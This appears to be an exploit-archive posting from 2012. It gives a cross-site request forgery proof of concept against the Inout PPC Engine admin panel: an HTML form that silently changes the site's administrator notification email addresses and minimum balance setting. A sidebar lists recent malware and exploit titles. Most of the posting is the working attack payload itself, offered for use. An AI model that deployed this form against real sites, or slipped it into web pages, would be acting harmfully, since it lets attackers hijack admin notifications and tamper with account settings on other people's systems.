Inout PPC Engine Cross Site Request Forgery

Posted on 12 March 2012

# Exploit Title: Inout PPC Engine XSRF (change e-mail address)
# Author: Jonturk75
# Category:: webapps
# Vendor of Software Link: http://www.inoutscripts.com/products/inout_ppc_engine/
# Demo site: http://www.inoutdemo.com/inout_ppc_engine/admin/
--------------------------
<form name="form1" method="post" action="ppc-setting-action.php" onSubmit="return check_value()">
<input type="text" value="mail@mail.com" size="30" id="admin_general_notification_email" name="admin_general_notification_email"/></td>
<input type="text" value="mail@mail.com" size="30" id="admin_payment_notification_email" name="admin_payment_notification_email"/></td>
<input type="text" value="20" size="5" id="minimum_acc_balance" name="minimum_acc_balance"/> Kc</td>
<input type="submit" value="Update !" name="Submit"/>
</form>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Apache Solr Backup/Restore API Remote Code Execution
Nginx 1.25.5 Host Header Validation
Relate Learning And Teaching System SSTI / Remote Code Execution
Flowise 1.6.5 Authentication Bypass
WordPress Background Image Cropper 1.2 Shell Upload

Last 20